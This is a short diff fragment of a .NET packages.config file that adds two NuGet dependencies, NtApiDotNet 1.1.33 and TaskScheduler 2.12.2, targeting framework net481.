+  <package id="NtApiDotNet" version="1.1.33" targetFramework="net481" />
+  <package id="TaskScheduler" version="2.12.2" targetFramework="net481" />
+</packages>
\ No newline at end of file